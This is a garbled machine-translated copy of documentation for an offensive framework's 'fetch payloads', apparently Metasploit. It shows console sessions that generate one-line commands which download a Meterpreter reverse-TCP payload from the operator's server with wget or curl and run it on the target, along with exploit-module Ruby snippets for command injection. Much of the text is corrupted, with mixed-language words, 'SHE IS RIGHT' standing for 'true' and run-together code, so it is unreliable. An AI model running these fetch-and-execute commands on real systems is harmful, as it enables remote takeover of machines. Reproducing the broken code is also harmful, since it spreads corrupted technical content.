Use payload retrieval (2023)

Bio sind Fetch-Payloads?

Fetch payloads are custom command-based payloads that use network-aware binaries on a remote host to download binary payloads to that remote host. Custom benefits are just benefits where we have added an additional feature to existing behavioral change benefits. In this case, you can still use all your favorite binary user data and transports, but we've also added an optional payload fetch adapter to serve payloads with network binaries and servers. They work similar to some command steps, but are based on the payload side instead of the exploit side for easier integration and portability. Payload retrieval is a quick and easy way to retrieve a session on a target with a command injection or code execution vulnerabilityIknown binary file with the ability to download and save the file.

Terminology

In the following documentation, it's helpful to agree on certain terms of use so we don't get confused or confused.Get cargo- Run the command on the remote host to get and runload capacity insured Get the binary number– The binary we use on the remote host to download the deployed payload. Examples could be WGET, cURL, or Certutil.Get the plate- The protocol used to download the delivered payload, such as HTTP, HTTPS, or TFTP.Get listeners– The server hosting the delivered payload.Call manager- The same asGet listeners load capacity insured– The base charge we want to launch. That's what we could call itCustomized carrying capacity.Handy payload trades- Handler of delivered cargo. This is just a standard chargemeterpreter/reverse_tcpofshell_reverse_tcp.

Organization

Unlike command stagers, which are organized by binaries, fetch tools are organized by servers. We currently support HTTP, HTTPS, and TFTP servers. After selecting a payload to retrieve, you can select a binary file to run on the remote host to download the specified payload before it runs.

This is the naming convention for the fetch payload:///served_payloadFor example:cmd/linux/https/x64/meterpreter/reverse_tcpIt will do four things: 1) Create onelinux/x64/meterpreter/reverse_tcpeleven binary as a secure payload. 2) Serve the above payload to the HTTPS server. 3) Start the handler for the delivered load to which the delivered load should be recalled. 4) Generate a command to run on the remote host that downloads and executes the given payload.

A simple standalone example

The fastest way to understand fetch payloads is to use them and examine the output. For example, let's assume a Linux target that can connect to us over an HTTP connection and has a command execution vulnerability. First, let's look at the payload individually:

msf6exploit(meer/ssh/sshexec) >Koristite-payload/cmd/linux/http/x64/meterpreter/reverse_tcpmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >Display options Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp): Name Current setting Required description ---- --------------- ------ - - -----------FETCH_COMMAND CURL yes Command to get payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)FETCH_FILENAME YXeSdwsoEfOH no Name to use on remote system when saving payload FETCH_SRVHOST 0.0.0.0 yes Local IP To deliver payloadFETCH_SRVPORT 8080 Yes Local port to deliver payloadFETCH_URIPATH No Local URI to deliver payloadFETCH_WRITABLE_DIR Yes External writable directory to store payloadLHOST Yes Listening address (interface can be specified)LPORT 4444 Yes Listening port View complete module information with the command info or info - D.msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) > 

options

FETCH_COMMANDis the binary we want to run on the remote host to download the custom payload. The following options are currently supported:CURL FTP TFTP TNFTP WGETon Linux hosts andCURL TFTP-CERTUTILon Windows hosts. We'll talk more about binaries later.FETCH_FILENAMEis the name under which the executable payload is stored on the remote host. This option is not supported by every binary and must end with.exeon Windows hosts. Default is random.FETCH_SRVHOSTis the IP on which the server is listening.FETCH_SRVPORTis the port on which the server is listening.FETCH_URIPATHis the URI corresponding to the payload file. The default setting is deterministic and based on the underlying payload, so a payload constructed in msfvenom will match a listener started in the framework, provided the underlying payload served is the same.FETCH_WRITABLE_DIRis the directory on the remote host where we want to save the set payload before running it. Not all binaries support this value. If you set this value and it is not supported, an error will be thrown.

The remaining options are those available to you in the deployed payload. In this case, our chargelinux/x64/meterpreter/reverse_tcpSo our only additional options areLHOSTILPORT. If we had chosen a different load, we would have had other options.

Generate the fetch payload

msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >setze FETCH_COMMAND WGETFETCH_COMMAND => WGETmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >set FETCH_SRVHOST 10.5.135.201FETCH_SRVHOST => 10.5.135.201msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >stel FETCH_SRVPORT 8000FETCH_SRVPORT => 8000 inmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >Set LHOST 10.5.135.201LHOST => 10.5.135.201msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >stel LPORT 4567LPORT => 4567 inmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >generate -f rawwget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) > 

You can see the generated fetch payload:wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &This command takes the provided payload, marks it as executable, and then runs it on the remote host.

Start the retrieval server

When you start thisCall manager, also starts the server hosting the binary contentIlistener for the delivered payload. OFdetailedsetSHE IS RIGHTyou can see that both the fetch handler and the provided payload handler are running:

msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >for_handler[*]wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &[*]The payload handler started as job 0[*]Fetch handler listens on 10.5.135.201:8000[*]http-server gestart[*]Reverse TCP handler started 10.5.135.201:4567

Fetch-Handler in Gediende Payload-Handler

The fetch handler is maintained by the served payload handler, so below is just the served payload handlerthe track, although the fetch handler listens for:

msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >jobs -lJobs==== ID Name Payload Options Payload -- ---- ------- ------------ 0 Exploitation: multi/handler cmd/linux/http /x64 /meterpreter/reverse_tcp tcp://10.5.135.201:4567msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >netstat -ant | Received 8000[*]exec: netstat -ant | grep 8000tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN

Killing the served payload handler also kills the fetch handler:

msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >The path -k 0[*]Stops the following tasks: 0[*]Job 0 is stoppedmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >netstat -ant | Received 8000[*]exec: netstat -ant | grep 8000msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) > 

Use Fetch payloads in flight

The nice thing about Fetch Payloads is that it gives you the ability to run a binary payload very quickly without relying on an in-frame session or pushing the payload to the target. If you have a shell session or even a really weird situation where you can run commands, you can quickly set up a session in the framework without having to manually load content. Just follow the steps above and run the given command. We currently only provide usable framework content, but in the future it would be relatively trivial to extend this to providing and running arbitrary executable binaries.

Use in exploitation

Using Fetch Payloads is no different than using any other command. First, give users access to platform-specific fetch payloads by adding a target that supports itARCH_CMDand also the desired platformWindowofLinux. Once the target is added, you can access the command by calling itnosivost.kodiranoand use it as a run command on a remote target.

Example linked to CmdStager

There is probably some overlap between getting payloads and setting commands. Let's briefly discuss how you can support both in one exploit. See the Command Stager documentation for information on required imports and details for Command Stager. In this case, I'm just documenting the changes that need to be made to make payloads work with Command stagers or use command-style payloads, which I recommend.

In this case, I've modified the code in the command stager documentation to support Linux and Unix command payloads. I just specified the field value forplatformvalue and changeTipto something more general:

"Goals" => [ [ 'linux command', { 'A book' => [ ARCH_CMD ], 'Platform' => [ 'Unix', 'Linux' ], 'Typ' => :nix_cmd } ] ]

Forexecute the commandmethod does not change:

def execute the command(cmd, _opts = {})fill_values I @sid.Nul? || @Sign.Nul?uri = Data storage['URIPAT'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' send_request_cgi({ 'method' => 'THAT', 'uri' => normalize_hours(uri), 'Cookie' => 'sid=' + @sid, 'ctype' => 'application/x-www-formulier-urlencoded', 'encode_params' => SHE IS RIGHT, 'vars_post' => { 'Sign' => @Sign, 'Text' => cmd, scream => 'leading', 'she' => @sid } })End

The only change in the exploitation method is to use a more general methodTipvalue in the case statement. Otherwise nothing needs to be changed.

 def exploit print_status("To carry out#{Goal.To do}for#{Data storage['PAYLOAD']}") Bumper Goal['Typ'] I :nix_cmd execute the command(capacity.encrypted) I :linux_dropper execute_cmdstager End End

If you have an exploit that already supports Unix Command payloads and you want it to support Linux Command payloads, such as Fetch payloads, you can just add itLinuxValue for platform field:

"Nixova naredba", { 'Platform' => [ 'Unix', 'Linux' ], 'A book' => ARCH_CMD, 'Typ' => :unix_cmd, }

Supported commands

I Windows and Linux

CURL

cURL comes pre-installed on Windows 10 and 11 and is incredibly common on Linux platforms. The options are very standardized for different versions and platforms. This makes cURL a good default choice for both Linux and Windows targets. The cURL command supports all options and types of server protocols.

TFTP

Binary TFTP is only useful in edge cases due to a long list of limitations: 1) It is a Windows feature, but is disabled by default in Windows Vista and above. 2) While you will probably find it on Linux and Unix hosts, the options are not standard across all versions. 3) The TFTP binary file included in many Linux systems and all Windows systems does not allow port configuration or target filename configurationFETCH_SRVPORTmust always be set to 69 andFETCH_WRITABLE_DIRIFETCH_FILENAMEmust be empty. Listening on port 69 in the framework can be problematic, so I recommend using the advanced optionFetchListenerBindPortto run the server on a different port and redirect the connection to the high port using a tool like iptables. For example, if you are on a Linux host with iptables, you can run the following commands to redirect a connection on UDP port 69 to UDP port 3069:sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069 sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069Then you can adjustFetchListenerBindPortto 3069 and call back properly. 4) Because TFTP is a UDP-based protocol and because of the server implementation within the framework, a new service is started each time you launch the TFTP polling handler:

msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >jobsJobs==== ID Naam Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter /obrnuti_tcp tcp://10.5.135.201:4444msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >setze LPORT 4445LPORT => 4445msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >for_handler[*]Run command on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe[*]Payload Handler started as a 4 job[*]Start the TFTP server at 10.5.135.201:8080[*]Reverse TCP handler started 10.5.135.201:4445msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >jobsJobs==== Id-naam Payload Payload-opties -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter /reverse_tcp tcp://10.5.135.201:4444 4 Exploitatie: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >netstat -i | Handle 8080[*]exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:*msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >setze FETCH_URIPATH test4FETCH_URIPATH => test4msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >setze LPORT 8547LPORT => 8547msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >for_handler[*]Run command on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe[*]Payload handler started as job 5[*]Start the TFTP server at 10.5.135.201:8080[*]Reverse TCP handler started 10.5.135.201:8547msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >netstat -i | Handle 8080[*]exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:*

Nothing prevents you from creating a race condition by running multiple TFTP servers with the same IP address, same port, etc.FETCH_URIValue, but for different payloads. This results in a race condition where the delivered charge is not deterministic.

Windows only

Certutil

Certutil is a good choice for Windows targets - it will likely be present in the latest versions of Windows and is highly configurable. The only problematic aspect is that there is no unsafe mode for certutil. So if you use Certutil with HTTPS protocol, the certificate must be correct and verified. SupportsHTTPIHTTPSlogs.

Only for Linux

ftp

FTP is an old but useful binary file. Although we support the use of binary FTP, we do not have an FTP server. Modern FTP versions support both HTTP and HTTPS protocols. Unfortunately, we only support these modern versions of inline FTP, so it may not be suitable for older systems.

TNFTP

TNFTP (not to be confused with TFTP) is a newer version of FTP. It is exactly the same as modern FTP, but sometimes old FTP and TNFTP exist on the system, hence the commandtnftpinstead offtp.

WGET

WGET is probably the first choice for a Linux-only target. It supports HTTPS and HTTP and all payload retrieval options. It's ubiquitous on Linux hosts and is very standard, making it a great choice.